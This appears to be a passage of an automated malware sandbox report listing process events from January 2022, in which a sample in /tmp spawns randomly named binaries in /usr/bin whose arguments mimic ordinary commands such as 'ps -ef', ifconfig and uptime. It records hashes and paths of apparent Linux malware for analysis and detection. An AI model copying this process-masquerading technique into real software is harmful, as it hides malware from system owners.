                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:/usr/bin/fbeozxrvfk gnome-terminal 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:/usr/bin/fbeozxrvfk "cd /etc" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:/usr/bin/fbeozxrvfk pwd 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:/usr/bin/fbeozxrvfk uptime 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:/usr/bin/fbeozxrvfk "ps -ef" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:42
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/fbeozxrvfk
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:5f75ece32f1e45dee8ff2808a0b11a47

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:/usr/bin/ekqpdizncq "grep \"A\"" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:/usr/bin/ekqpdizncq "ps -ef" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:/usr/bin/ekqpdizncq "ps -ef" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:/usr/bin/ekqpdizncq "sleep 1" 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:/usr/bin/ekqpdizncq ifconfig 5218
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:42:47
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/ekqpdizncq
                                                                  Arguments:n/a
                                                                  File size:548638 bytes
                                                                  MD5 hash:e8694e408d04b366240a7a83574c39c8

                                                                  General

                                                                  Start time:19:40:49
                                                                  Start date:05/01/2022
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:n/a
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  General

                                                                  Start time:19:40:49
                                                                  Start date:05/01/2022
                                                                  Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                  File size:22760 bytes
                                                                  MD5 hash:3633b075f40283ec938a2a6a89671b0e